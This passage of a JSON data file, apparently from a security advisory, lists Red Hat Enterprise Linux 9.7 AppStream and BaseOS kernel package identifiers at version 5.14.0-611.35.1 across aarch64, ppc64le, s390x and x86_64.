"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
